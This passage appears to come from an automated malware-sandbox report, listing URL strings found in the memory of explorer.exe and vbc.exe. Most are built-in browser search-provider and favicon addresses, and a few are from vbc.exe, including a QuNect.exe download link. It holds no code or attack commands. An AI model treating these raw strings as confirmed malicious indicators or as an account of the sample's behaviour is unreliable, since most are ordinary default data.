              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
              Source: explorer.exe, 00000007.00000000.2192124116.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: explorer.exe, 00000007.00000000.2192124116.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
              Source: vbc.exe, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmpString found in binary or memory: http://qunect.com/download/QuNect.exe
              Source: vbc.exe, 00000004.00000002.2181150885.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmpString found in binary or memory: http://qunect.com/download/QuNect.exeMOperation
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
              Source: explorer.exe, 00000007.00000002.2380506193.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
              Source: explorer.exe, 00000007.00000000.2195116890.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
              Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
              Source: vbc.exe, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmpString found in binary or memory: http://validator.w3.org/check?uri=referer
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
              Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
              Source: explorer.exe, 00000007.00000002.2380506193.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
